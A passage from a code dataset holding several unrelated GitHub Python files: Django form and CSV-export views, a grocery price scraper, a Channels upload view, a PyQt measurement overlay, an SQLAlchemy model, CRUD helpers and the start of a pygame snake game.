Image.fromarray(color).save(\"checkpoint/fake_b_{}.png\".format(epoch_))","repo_name":"Andyzzz/facerenderer-pix2pix-hair","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21583037941","text":"from django.shortcuts import render, redirect\nimport pandas as pd\nimport datetime\nfrom django.http import HttpResponse\nfrom LabGRis.decorators import validate_session, getSessionUser\nfrom LabGRis.funcoesCompartilhadas import criarListaDoBanco, criarListaDoBancoKEY, identificarAlternativaMarcada\nfrom LabGRis.pyrebase_settings import db\nfrom perguntas.classes.Perguntas import Pergunta\nfrom categorias.classes.Categorias import Categoria\nfrom responderFicha.classes.FichaPreenchida import FichaPreenchida\n\n\n# Bancos\nbancoModeloFicha = \"Templates de Fichas\"\ntabelaBancoFicha = \"fichaAppTeste\"\n\n# Redirecionamento de páginas\npgCampo = '/fichas/'\n\n@validate_session\ndef responderFicha(request):\n data = {}\n data['SessionUser'] = getSessionUser(request)\n data['context'] = \"\"\n\n ######### Busca Modelos de Ficha já cadastradas\n fichaSalvas = db.child(tabelaBancoFicha).get()\n listaFicha = criarListaDoBanco(fichaSalvas)\n data['listaFicha'] = listaFicha\n\n if request.method == \"POST\":\n codFicha = request.POST.getlist('codFicha', 'Pergunta não carregada')\n\n # Lista para colocar dados das fichas\n modeloFicha = []\n tituloFicha = []\n perguntasDasFichas = set()\n ## Carregando dados das fichas selecionadas\n for ficha in codFicha:\n dadosDaFicha = db.child(tabelaBancoFicha).child(ficha).get().val()\n\n modeloFicha.append(dadosDaFicha['modeloFicha'])\n tituloFicha.append(dadosDaFicha['tituloFicha'])\n\n for cat in dadosDaFicha['categorias']:\n for per in cat['perguntas']:\n perguntasDasFichas.add(per['tituloPergunta'])\n\n # Montando o dicionario para converter em DataFrame\n dadosFichas = {\n 'Segue o modelo': modeloFicha,\n 'Cód. 
Ficha': tituloFicha\n }\n\n # Transformando os dados em um DataFrame\n dadosFicha_df = pd.DataFrame(data=dadosFichas)\n #print(\"DataFrame da(s) fichas:\\n\", dadosFicha_df)\n\n #print('Perguntas', perguntasDasFichas)\n respostasDasPerguntas = []\n for ficha in codFicha:\n respostas = [''] * len(perguntasDasFichas)\n #print(\"----Ficha:\", ficha)\n dadosCat = db.child(tabelaBancoFicha).child(ficha).child('categorias').get().val()\n for cat in dadosCat:\n for perg in cat['perguntas']:\n for perF in perguntasDasFichas:\n if perg['tituloPergunta'] == perF:\n try:\n #print(\"Diss\", list(perguntasDasFichas).index(perF), \"\\b: \", perg['resposta'])\n respostas[list(perguntasDasFichas).index(perF)] = perg['resposta']\n except:\n for alt in perg['alternativas']:\n if alt['resposta'] == True:\n #print(\"Per\", list(perguntasDasFichas).index(perF), \"\\b: \", alt['tituloAlternativa'])\n respostas[list(perguntasDasFichas).index(perF)] = alt['tituloAlternativa']\n respostasDasPerguntas.append(respostas)\n\n # Montando dataframe das respostas\n respostasDasPerguntas_df = pd.DataFrame(respostasDasPerguntas, columns=perguntasDasFichas)\n #print(\"Respostas das fichas:\\n\", respostasDasPerguntas_df)\n\n # Juntando dados das fichas com as respostas\n csvFichas = pd.merge(dadosFicha_df, respostasDasPerguntas_df, left_index=True, right_index=True)\n #print(\"DataFrame das fichas:\\n\", csvFichas)\n\n # Disponibilizando CSV para download\n responseCSV = HttpResponse(content_type='text/csv')\n responseCSV['Content-Disposition'] = 'attachment; filename=CSV_LabGRis ' + datetime.datetime.now().strftime('%d/%m/%Y') + '.csv'\n csvFichas.to_csv(path_or_buf=responseCSV, index=False)\n\n return responseCSV\n #return redirect(pgCampo)\n\n return render(request, 'responderFicha/responderFicha.html', data)\n\n\n@validate_session\ndef modelosFicha(request):\n data = {}\n data['SessionUser'] = getSessionUser(request)\n data['context'] = \"\"\n\n # Bancos\n bancoModeloFicha = \"Templates de Fichas\"\n\n ######### Busca Modelos de Ficha já cadastradas\n fichaSalvas = db.child(bancoModeloFicha).get()\n listaFicha = criarListaDoBanco(fichaSalvas)\n data['listaFicha'] = listaFicha\n\n return render(request, 'responderFicha/modelosFicha.html', data)\n\n\ndef preenchendoFicha(request, fichaSelec):\n data = {}\n data['SessionUser'] = getSessionUser(request)\n data['context'] = \"\"\n data['ficha'] = fichaSelec\n\n # Bancos\n bancoModeloFicha = \"Templates de Fichas\"\n\n ######### Busca categorias salva por ficha e conta o número de categoria\n BuscaCategBanco = db.child(bancoModeloFicha).child(fichaSelec).child(\"categorias\").get()\n listaCategBanco = criarListaDoBancoKEY(BuscaCategBanco)\n contListaCategBanco = len(\n listaCategBanco) # Categorias são númeradas no banco, para encontrar todas precisa saber quantas tem\n\n ########## Listando categorias\n listaCategoriaSalvaFicha = []\n for ContFor in range(contListaCategBanco):\n categoriaDoBanco = db.child(bancoModeloFicha).child(fichaSelec).child(\"categorias\").child(\n ContFor).get() # Encontra cada categoria da ficha selecionada\n categoriaSalvaFicha = criarListaDoBanco(categoriaDoBanco) # Carrega os dados da categoria\n tituloCategoria = categoriaSalvaFicha[1] # Título categoria\n perguntasFicha = categoriaSalvaFicha[0] # Perguntas da categoria\n\n perguntaDaLista = []\n for per in perguntasFicha:\n perguntaDaLista.append(per)\n listaDePerguntas = []\n for perguntas in perguntaDaLista:\n listaAlternativas = []\n try:\n for alter in perguntas[\"alternativas\"]:\n 
alternativaFicha = alter[\"tituloAlternativa\"]\n listaAlternativas.append(alternativaFicha)\n except:\n listaAlternativas.append(\"dissertativa\")\n objectPerguntas = Pergunta(perguntas[\"tituloPergunta\"], listaAlternativas, perguntas[\"multiplasRespostas\"])\n listaDePerguntas.append(objectPerguntas)\n objectCategoria = Categoria(tituloCategoria, 1, listaDePerguntas)\n listaCategoriaSalvaFicha.append(objectCategoria)\n\n ############################ Organizando perguntas para enviar ao template ######################################\n listaApenasPerguntas = [] # Lista contendo todas as perguntas, sem nenhum criterio\n listaPergutas = [] # Lista com [[[Cat1],[perguntas e respostas]],[[Cat2], [perguntas e respostas]]]\n for cat in listaCategoriaSalvaFicha:\n juntaInfPerguntas = []\n juntaInfPerguntas.append([cat.get_tituloCategoria()])\n juntPerguntas = []\n for perg in cat.get_objectPerguntas():\n juntPerguntas.append({\"pergunta\": perg.get_tituloPergunta(), \"alternativas\": perg.get_tituloAlternativa(), \"multiplasRespostas\": perg.get_multiplasRespostas})\n listaApenasPerguntas.append(perg.get_tituloPergunta())\n juntaInfPerguntas.append(juntPerguntas)\n #juntaInfPerguntas.append(perg)\n #print(\"AQUI:\", cat)\n listaPergutas.append(juntaInfPerguntas)\n\n data['categoriaSelec'] = listaPergutas\n\n ################################################################ Recuperando informações do form ###################\n if request.method == \"POST\":\n listaPerguntasForm = []\n for perg in listaApenasPerguntas:\n pergunta = perg\n perguntaForm = request.POST.get(pergunta, 'Pergunta não carregada')\n resposta = ('resposta' + perg)\n respostaForm = request.POST.get(resposta, 'Resposta não carregada')\n if len(request.POST.getlist(resposta, 'Resposta não carregada')) > 1:\n respostaForm = request.POST.getlist(resposta, 'Resposta não carregada')\n tituloFicha = 'tituloFicha'\n tituloFichaForm = request.POST.get(tituloFicha, 'Titulo Ficha não carregada')\n tituloCategoriaF = 'tituloCategoria'\n tituloCategoriaForm = request.POST.get(tituloCategoriaF, 'Categoria não carregada')\n\n objectPerguntaPreenchida = Pergunta(perguntaForm, respostaForm)\n listaPerguntasForm.append(objectPerguntaPreenchida)\n\n ##################################################################### Salvando no banco\n contCat = 0\n objectFichaPreenchida = FichaPreenchida(tituloFichaForm, request.session.get('userId'), listaCategoriaSalvaFicha, fichaSelec)\n # Cria a ficha no banco\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).set(objectFichaPreenchida.enviarFichaFirebase())\n # Percorre cada categoria\n for categoriaList in listaCategoriaSalvaFicha:\n idTeste = 0\n objectCategoriaPreenchida = Categoria(categoriaList.get_tituloCategoria(), idTeste, categoriaList.get_objectPerguntas())\n # Salva as categorias\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).update(\n objectFichaPreenchida.updateFichaCategoriaFirebase(categoriaList.get_tituloCategoria(), idTeste,\n contCat))\n contP = 0\n for perg in objectCategoriaPreenchida.get_objectPerguntas(): # Salva as perguntas\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).update(\n objectFichaPreenchida.updateFichaPerguntasFirebase(perg.get_tituloPergunta(),\n perg.get_tituloAlternativa(),\n contP,\n perg.get_multiplasRespostas()))\n contAlt = 0\n for alter in perg.get_tituloAlternativa(): # Salva as alternativas\n if alter == \"dissertativa\":\n for pergForm in 
listaPerguntasForm:\n if perg.get_tituloPergunta() == pergForm.get_tituloPergunta():\n respostaDissertativa = pergForm.get_tituloAlternativa()\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).child('perguntas').child(contP).update(\n objectFichaPreenchida.updateFichaAlternativasDissertativaFirebase(respostaDissertativa,\n contAlt))\n\n else:\n marcadoComo = identificarAlternativaMarcada(listaPerguntasForm, perg, alter)#\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).child('perguntas').child(contP).update(\n objectFichaPreenchida.updateFichaAlternativasFirebase(alter, contAlt, marcadoComo))\n\n contAlt = contAlt + 1\n\n contP = contP + 1\n\n contCat = contCat + 1\n\n # html = \"Pergunta:\" + respostaForm + \"
    \"\n return redirect(pgCampo)\n\n return render(request, 'responderFicha/preencherFicha.html', data)\n\n\ndef excluirFicha(request, fichaSelec):\n db.child(tabelaBancoFicha).child(fichaSelec).remove()\n\n return redirect('url_responderFicha')\n\ndef alterarFicha(request, fichaSelec):\n data = {}\n data['SessionUser'] = getSessionUser(request)\n\n dadosFicha = db.child(tabelaBancoFicha).child(fichaSelec).get().val()\n data['fichaSelec'] = dadosFicha\n\n contListaCategBanco = len(dadosFicha['categorias'])\n\n listaApenasPerguntas = []\n for categorias in dadosFicha['categorias']:\n for perguntas in categorias['perguntas']:\n listaApenasPerguntas.append(perguntas['tituloPergunta'])\n\n if request.method == \"POST\":\n listaPerguntasForm = []\n for perg in listaApenasPerguntas:\n pergunta = perg\n perguntaForm = request.POST.get(pergunta, 'Pergunta não carregada')\n resposta = ('resposta' + perg)\n respostaForm = request.POST.get(resposta, 'Resposta não carregada')\n if len(request.POST.getlist(resposta, 'Resposta não carregada')) > 1:\n respostaForm = request.POST.getlist(resposta, 'Resposta não carregada')\n tituloFicha = 'tituloFicha'\n tituloFichaForm = request.POST.get(tituloFicha, 'Titulo Ficha não carregada')\n tituloCategoriaF = 'tituloCategoria'\n tituloCategoriaForm = request.POST.get(tituloCategoriaF, 'Categoria não carregada')\n\n objectPerguntaPreenchida = Pergunta(perguntaForm, respostaForm)\n listaPerguntasForm.append(objectPerguntaPreenchida)\n\n\n ########## Listando categorias\n listaCategoriaSalvaFicha = []\n for ContFor in range(contListaCategBanco):\n categoriaDoBanco = db.child(tabelaBancoFicha).child(fichaSelec).child(\"categorias\").child(\n ContFor).get() # Encontra cada categoria da ficha selecionada\n categoriaSalvaFicha = criarListaDoBanco(categoriaDoBanco) # Carrega os dados da categoria\n tituloCategoria = categoriaSalvaFicha[1] # Título categoria\n perguntasFicha = categoriaSalvaFicha[0] # Perguntas da categoria\n\n perguntaDaLista = []\n for per in perguntasFicha:\n perguntaDaLista.append(per)\n listaDePerguntas = []\n for perguntas in perguntaDaLista:\n listaAlternativas = []\n try:\n for alter in perguntas[\"alternativas\"]:\n alternativaFicha = alter[\"tituloAlternativa\"]\n listaAlternativas.append(alternativaFicha)\n except:\n listaAlternativas.append(\"dissertativa\")\n objectPerguntas = Pergunta(perguntas[\"tituloPergunta\"], listaAlternativas, perguntas[\"multiplasRespostas\"])\n listaDePerguntas.append(objectPerguntas)\n objectCategoria = Categoria(tituloCategoria, 1, listaDePerguntas)\n listaCategoriaSalvaFicha.append(objectCategoria)\n\n ##################################################################### Salvando no banco\n contCat = 0\n objectFichaPreenchida = FichaPreenchida(tituloFichaForm, request.session.get('userId'),\n listaCategoriaSalvaFicha, fichaSelec)\n # Cria a ficha no banco\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).set(\n objectFichaPreenchida.enviarFichaFirebase(dadosFicha['modeloFicha'])) #### AQUI ESTA MUDANDO O NOME DA FICHA\n\n # Percorre cada categoria\n for categoriaList in listaCategoriaSalvaFicha:\n idTeste = 0\n objectCategoriaPreenchida = Categoria(categoriaList.get_tituloCategoria(), idTeste,\n categoriaList.get_objectPerguntas())\n # Salva as categorias\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).update(\n objectFichaPreenchida.updateFichaCategoriaFirebase(categoriaList.get_tituloCategoria(), idTeste,\n contCat))\n contP = 0\n for perg in 
objectCategoriaPreenchida.get_objectPerguntas(): # Salva as perguntas\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).update(\n objectFichaPreenchida.updateFichaPerguntasFirebase(perg.get_tituloPergunta(),\n perg.get_tituloAlternativa(),\n contP,\n perg.get_multiplasRespostas()))\n contAlt = 0\n for alter in perg.get_tituloAlternativa(): # Salva as alternativas\n if alter == \"dissertativa\":\n for pergForm in listaPerguntasForm:\n if perg.get_tituloPergunta() == pergForm.get_tituloPergunta():\n respostaDissertativa = pergForm.get_tituloAlternativa()\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).child('perguntas').child(contP).update(\n objectFichaPreenchida.updateFichaAlternativasDissertativaFirebase(respostaDissertativa,\n contAlt))\n\n else:\n marcadoComo = identificarAlternativaMarcada(listaPerguntasForm, perg, alter)#\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).child('perguntas').child(contP).update(\n objectFichaPreenchida.updateFichaAlternativasFirebase(alter, contAlt, marcadoComo))\n\n contAlt = contAlt + 1\n\n contP = contP + 1\n\n contCat = contCat + 1\n\n # html = \"Pergunta:\" + respostaForm + \"
    \"\n\n return redirect('url_responderFicha')\n\n\n return render(request, 'responderFicha/alterarFicha.html', data)","repo_name":"Renan-Bodom/LabGRis","sub_path":"responderFicha/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18079,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36087240784","text":"\"\"\"Rimi webpage scraper\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nfrom src.util.cacher import Cacher\n\nfrom src.util.product import ProductInfo\nfrom src.util.provider import Provider\n\n\nclass RimiProvider(Provider):\n \"\"\"Rimi webpage scraper (initialization makes 1 request)\"\"\"\n\n def __init__(self):\n self._products: list[ProductInfo] = []\n self._use_cache = True\n self._cache_file_name = \"rimi_cache.cache\"\n self._base_url = \"https://www.rimi.ee/\"\n self._estore_url = self._base_url + \"epood\"\n self._category_urls = self._get_category_urls()\n self._category_urls_index = 0\n self._page_index = 1\n\n def make_next_request(self) -> None:\n \"\"\"Make the next request\"\"\"\n products = self._get_products_from_category(\n self._category_urls[self._category_urls_index], self._page_index)\n\n if products is None:\n self._category_urls_index += 1\n self._page_index = 1\n return\n\n self._products.extend(products)\n\n self._page_index += 1\n\n def get_products(self) -> list[ProductInfo] | None:\n \"\"\"Return the products\"\"\"\n if self._products:\n if self._use_cache:\n cache = Cacher(self._cache_file_name)\n cache.cache_products(self._products)\n return self._products\n else:\n cache = Cacher(self._cache_file_name)\n try:\n return cache.get_cached_products()\n except Exception:\n return None\n\n def get_progress(self) -> int:\n \"\"\"Return the progress\"\"\"\n return self._category_urls_index * 100 // len(self._category_urls)\n\n def set_use_cache(self, use_cache: bool) -> None:\n \"\"\"Set False if you dont want to use cache (default: True)\"\"\"\n self._use_cache = use_cache\n\n def _get_category_urls(self) -> list[str]:\n \"\"\"Get category urls\"\"\"\n CATEGORY_CLASS_NAME = \"category-menu -second-level js-categories-level-container\"\n\n # CATEGORY_CLASS_NAME > ul > li > a\n html = requests.get(self._estore_url, timeout=10).text\n soup = BeautifulSoup(html, \"html.parser\")\n\n urls = []\n for category in soup.find_all(\"div\", class_=CATEGORY_CLASS_NAME):\n urls.append(self._base_url +\n category.find(\"ul\").find(\"li\").find(\"a\").get(\"href\"))\n\n return urls\n\n def _get_products_from_category(self, category_url: str, page: int) -> list[ProductInfo]:\n \"\"\"Get products from a category\"\"\"\n # page querry for the category page\n PAGE_SIZE = 100\n PRODUCT_CONTAINER_CLASS = \"card__details\"\n PRICE_CONTAINER_CLASS = \"price-tag\"\n UNIT_PRICE_CLASS = \"card__price-per\"\n\n products = []\n\n html = requests.get(\n category_url + f\"?page={page}&pageSize={PAGE_SIZE}\", timeout=10).text\n soup = BeautifulSoup(html, \"html.parser\")\n category = soup.find(\"h1\").text\n product_containers = soup.find_all(\n \"div\", {\"class\": PRODUCT_CONTAINER_CLASS})\n\n if product_containers is None or not product_containers:\n return None\n\n for product in product_containers:\n name = product.find(\"p\").text\n\n price_conatiner = product.find(\n \"div\", {\"class\": PRICE_CONTAINER_CLASS})\n\n if price_conatiner is None:\n continue\n\n # price is in the form of price_main.price_decimal\n price_main = int(price_conatiner.find(\"span\").text)\n price_decimal = 
int(price_conatiner.find(\"sup\").text)\n price = (price_main * 100 + price_decimal) / 100\n\n # [price, unit]\n unit_price = product.find(\n \"p\", {\"class\": UNIT_PRICE_CLASS}).text.replace(\" \", \"\").replace(\"\\n\", \"\").split(\"€/\")\n\n price_per_unit = float(unit_price[0].replace(\",\", \".\"))\n weight_unit = unit_price[1]\n\n product: ProductInfo = {\n \"name\": name,\n \"price\": price,\n \"price_per_unit\": price_per_unit,\n \"weight_unit\": weight_unit,\n \"category\": category,\n \"store_name\": \"rimi\",\n \"weight\": price / price_per_unit\n }\n\n products.append(product)\n\n return products\n\n def delete_cache(self) -> None:\n \"\"\"Delete the cache file\"\"\"\n Cacher(self._cache_file_name).delete_cache()\n","repo_name":"Rig14/price-scraper-est","sub_path":"src/rimi/rimi.py","file_name":"rimi.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23085566862","text":"import csv\nimport json\n\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\n\n\nimport channels.layers\nfrom asgiref.sync import async_to_sync\n\ndef index(request):\n return render(request, 'chat/index.html')\n\n@csrf_exempt\ndef room(request, room_name):\n print(room_name)\n print(request.FILES[room_name])\n csv_file = request.FILES[room_name]\n decoded_file = csv_file.read().decode('utf-8').splitlines()\n reader = csv.DictReader(decoded_file)\n channel_layer = channels.layers.get_channel_layer()\n total = len(decoded_file)\n count = 0\n for row in reader:\n count += 1\n if count % 50 == 0:\n async_to_sync(channel_layer.group_send)(f'chat_{room_name}', {'type': 'chat_message','message':f'Procesed {count} of {total} '})\n print(row)\n\n async_to_sync(channel_layer.group_send)(f'chat_{room_name}', {'type': 'chat_message','message':'end'})\n\n","repo_name":"nsht/django_channels_quick_start","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1526602209","text":"import sys\nfrom PyQt4 import QtGui, QtCore\nimport math\n\nclass Window(QtGui.QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 500, 300)\n self.setWindowTitle(\"Mentor\")\n self.setWindowIcon(QtGui.QIcon('ids.png'))\n self.home()\n self.x_move = 0\n self.y_move = 0\n self.x_move_1 = 0\n self.y_move_2 = 0\n self.x_spacer = 250\n self.x_min = 10\n self.electrod = 100 #in microni\n self.x_calibration = 100\n self.increment = 1800.0\n\n def home(self):\n\n self.showFullScreen()\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n pixmap = QtGui.QPixmap(\"1.jpg\")\n painter.drawPixmap(self.rect(), pixmap)\n color = QtGui.QColor(255, 0, 0)\n pen = QtGui.QPen(color, 3)\n pen.setStyle(QtCore.Qt.DashLine)\n painter.setPen(pen)\n # linie orizontala\n painter.drawLine(0, self.rect().height() / 2 + self.y_move, self.rect().width(), self.rect().height() / 2 + self.y_move)\n\n # linie verticala stanga\n color = QtGui.QColor(0, 0, 255)\n pen = QtGui.QPen(color, 3)\n pen.setStyle(QtCore.Qt.DashLine)\n painter.setPen(pen)\n painter.drawLine(self.rect().width() / 2 + self.x_move - self.x_spacer, 0, self.rect().width() / 2 + self.x_move - self.x_spacer, self.rect().height())\n\n # linie verticala dreapta\n color = QtGui.QColor(0, 0, 255)\n pen = QtGui.QPen(color, 3)\n pen.setStyle(QtCore.Qt.DashLine)\n 
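        # Aside, not from the original file: the readout drawn further below
        # converts a pixel distance between the two vertical lines into
        # micrometres, scaled by a reference electrode of known diameter:
        #   value_um = electrod * distance_px / calibration_px
        # A quick numeric sketch with hypothetical values:
        #   electrod, calibration_px, distance_px = 100, 520, 610
        #   value_um = 100 * 610 / 520  # ~117.3 micrometres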
painter.setPen(pen)\n painter.drawLine(self.rect().width() / 2 + self.x_move_1 + self.x_spacer, 0, self.rect().width() / 2 + self.x_move_1 + self.x_spacer, self.rect().height())\n\n # afisare distanta intre liniile verticale\n painter.setPen(QtGui.QColor(125, 125, 125))\n painter.setFont(QtGui.QFont('Consolas', 30))\n val_afisata = (self.electrod * (self.x_move_1 - self.x_move + 2 * self.x_spacer)) / self.x_calibration #(self.rect().width() / 2 + self.x_move_1 + self.x_spacer) - (self.rect().width() / 2 + self.x_move - self.x_spacer)\n #print(lol)\n painter.drawText(50, 100, u'\\u00D8' + ' ' + str(val_afisata) + ' ' + u'\\u03BCm')\n\n # afisare calcul unghi\n unghi_teta = math.degrees(math.atan(self.increment/(val_afisata / 2)))\n painter.drawText(50, 150, u'\\u2221' + ' ' + str(round(90 - unghi_teta, 2)) + u'\\u00B0' + ', increment de ' + str(self.increment/1000) + ' mm')\n\n def keyPressEvent(self, e):\n k = e.key()\n m = int(e.modifiers())\n\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Right'):\n self.x_move += 10\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence(QtCore.Qt.SHIFT + QtCore.Qt.Key_Right):\n self.x_move += 1\n #print(self.x_move)\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Left'):\n self.x_move -= 10\n #print(self.x_move)\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence(QtCore.Qt.SHIFT + QtCore.Qt.Key_Left):\n self.x_move -= 1\n if e.key() == QtCore.Qt.Key_Up:\n self.y_move -= 10\n #print(self.y_move)\n if e.key() == QtCore.Qt.Key_Down:\n self.y_move += 10\n #print(self.y_move)\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Ctrl+Right'):\n self.x_move_1 += 10\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence(QtCore.Qt.CTRL + QtCore.Qt.SHIFT + QtCore.Qt.Key_Right):\n self.x_move_1 += 1\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Ctrl+Left'):\n self.x_move_1 -= 10\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence(QtCore.Qt.CTRL + QtCore.Qt.SHIFT + QtCore.Qt.Key_Left):\n self.x_move_1 -= 1\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Ctrl+N'):\n self.x_move = 0\n self.y_move = 0\n self.x_move_1 = 0\n self.y_move_2 = 0\n self.x_calibration = 100\n if e.key() == QtCore.Qt.Key_C:\n self.showDialogCalibration()\n if e.key() == QtCore.Qt.Key_I:\n self.showDialogIncrement()\n self.update()\n\n def showDialogCalibration(self):\n text, result = QtGui.QInputDialog.getText(self, 'Calibrare camera ', 'Introdu diametrul electrodului:')\n if result == True:\n self.electrod = int(text)\n self.x_calibration = self.x_move_1 - self.x_move + 2 * self.x_spacer\n\n def showDialogIncrement(self):\n text, result = QtGui.QInputDialog.getText(self, 'Increment ', 'Introdu incrementul in mm:')\n if result == True:\n self.increment = float(text) * 1000\n\n def close_application(self):\n #print(\"custom\")\n sys.exit()\n\ndef run():\n app = QtGui.QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n\nrun()","repo_name":"tr0ubl3/PosCam","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17377029171","text":"# _*_ encoding:utf-8 _*_\n__author__ = 'williamcullen'\n__date__ = '2017/8/2 11:33'\nfrom sqlalchemy import Table, Column, Integer, String\n\nfrom config import metadata\n\n# 定义表\nnews = Table('news', metadata,\n Column('id', Integer, primary_key=True),\n Column('title', String(128)),\n Column('text', String(1280)),\n 
)\n","repo_name":"williamcullen/flaskr-github","sub_path":"flaskr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"467490033","text":"from . import CardLabelRelation, Card, Label\nfrom . import utils\n\n\ndef create(user_id, card_id, label_id, is_reversed=False) -> [CardLabelRelation, bool]:\n card = utils.user_protected_read(Card, user_id, card_id)\n label = utils.user_protected_read(Label, user_id, label_id)\n return CardLabelRelation.get_or_create(\n card=card, label=label,\n is_reversed=is_reversed\n )\n\n\ndef create_by_instances(card: Card, label: Label, is_reversed=False) -> [CardLabelRelation, bool]:\n return CardLabelRelation.get_or_create(\n card=card, label=label,\n is_reversed=is_reversed\n )\n\n\ndef read_one(user_id, label_id, card_id) -> [CardLabelRelation, bool]:\n return create(user_id, card_id, label_id)\n\n\ndef switch_relation(user_id, card_id, label_id) -> [CardLabelRelation, bool]:\n relation_with_flag = create(user_id, card_id, label_id)\n if relation_with_flag[1]:\n return relation_with_flag[0]\n relation_with_flag[0].delete_instance()\n return None\n\n\ndef copy_relation_from_other_label(user_id: int, target_label_id: int, source_label_id: int):\n target_label: Label = utils.user_protected_read(Label, user_id, target_label_id)\n source_label: Label = utils.user_protected_read(Label, user_id, source_label_id)\n source_label_cards = source_label.get_cards()\n for card in source_label_cards:\n create_by_instances(card, target_label)\n\n\ndef delete(user_id, card_id, label_id):\n card = utils.user_protected_read(Card, user_id, card_id)\n label = utils.user_protected_read(Label, user_id, label_id)\n relation = CardLabelRelation.get_or_none(card=card, label=label)\n if not relation:\n raise IndexError\n return relation.delete_instance()\n","repo_name":"KozlovKV/anki-bot","sub_path":"core/CRUD/cardLabelRelation.py","file_name":"cardLabelRelation.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6937989132","text":"import logging\n\nimport pygame\n\nfrom config import Config\nfrom snake import Snake\nfrom game import Game\n\n\nclass Engine:\n \"\"\"\n Описывает состояния и функционал \"игрового движка\".\n Получение ввода от игрока, вывод картинки на экран.\n\n Args:\n config (Config): инстанс конфигурации игры\n\n \"\"\"\n # States\n state_menu, state_game, state_gameover, state_enter_highscore = range(4)\n # Colors\n white = (255, 255, 255)\n black = (0, 0, 0)\n red = (255, 0, 102)\n green = (0, 153, 51)\n blue = (0, 102, 255)\n gray = (102, 102, 153)\n color_top_info_line = (204, 153, 255)\n color_info_line_text = (0, 51, 153)\n color_background = (204, 204, 255)\n\n def __init__(self, config: Config):\n self.__config = config\n self.__state = self.state_menu\n self.__block_size = config['block_size'] # размер одного блока в пикселях\n self.__margin_top = config['margin_top']\n self.__base_speed = config['base_speed']\n\n pygame.init()\n\n self.__game = Game(config['board_width'], config['board_height'], config['player_name'])\n self.__window_width = self.__game.board().width() * self.__block_size\n self.__window_height = self.__margin_top + self.__game.board().height() * self.__block_size\n self.__display = pygame.display.set_mode((self.__window_width, self.__window_height))\n pygame.display.set_caption(config['window_caption'])\n 
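        # Aside, not from the original file: the clock created below paces the
        # game with clock.tick(base_speed + level) once per frame, and each
        # frame is one snake turn, so a turn lasts roughly
        # 1.0 / (base_speed + level) seconds. With hypothetical values:
        #   base_speed, level = 8, 3
        #   seconds_per_turn = 1.0 / (base_speed + level)  # ~0.09 s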
self.__clock = pygame.time.Clock()\n logging.info(f'New game initialized: {config[\"window_caption\"]}, {self.__window_width}x{self.__window_height}')\n\n @staticmethod\n def quit():\n \"\"\"\n Завершает работу библиотеки pygame и программы в целом.\n \"\"\"\n pygame.quit()\n quit()\n\n def draw_frame(self):\n \"\"\"\n Отрисовывает один кадр игры и выводит его на экран.\n Один кадр на один игровой ход. После отрисовки производится задержка, определяющая скорость игры.\n \"\"\"\n font_logo_name = self.__config['font_logo_name']\n font_info_line_name = self.__config['font_info_line_name']\n font_paused_name = self.__config['font_paused_name']\n str_logo = 'SNAKE'\n str_paused = '* PAUSE *'\n str_game_over = 'Game Over!'\n\n self.__display.fill(self.color_background)\n\n # МЕНЮ - show 'logo'\n if self.__state == self.state_menu:\n font_logo = pygame.font.SysFont(font_logo_name, 100)\n surf_logo = font_logo.render(str_logo, True, self.color_info_line_text)\n logo_width, logo_height = font_logo.size(str_logo)\n self.__display.blit(surf_logo, [int((self.__window_width - logo_width) / 2),\n int((self.__window_height - logo_height) / 2)])\n\n # ИГРА или ГЕЙМОВЕР\n if self.__state == self.state_game or self.__state == self.state_gameover:\n # Отрисовываем змейку\n for block in self.__game.board().snake().blocks():\n pygame.draw.rect(self.__display,\n self.red if block.is_head() else self.blue,\n [block.x() * self.__block_size,\n self.__margin_top + block.y() * self.__block_size,\n self.__block_size, self.__block_size])\n\n # Отрисовываем 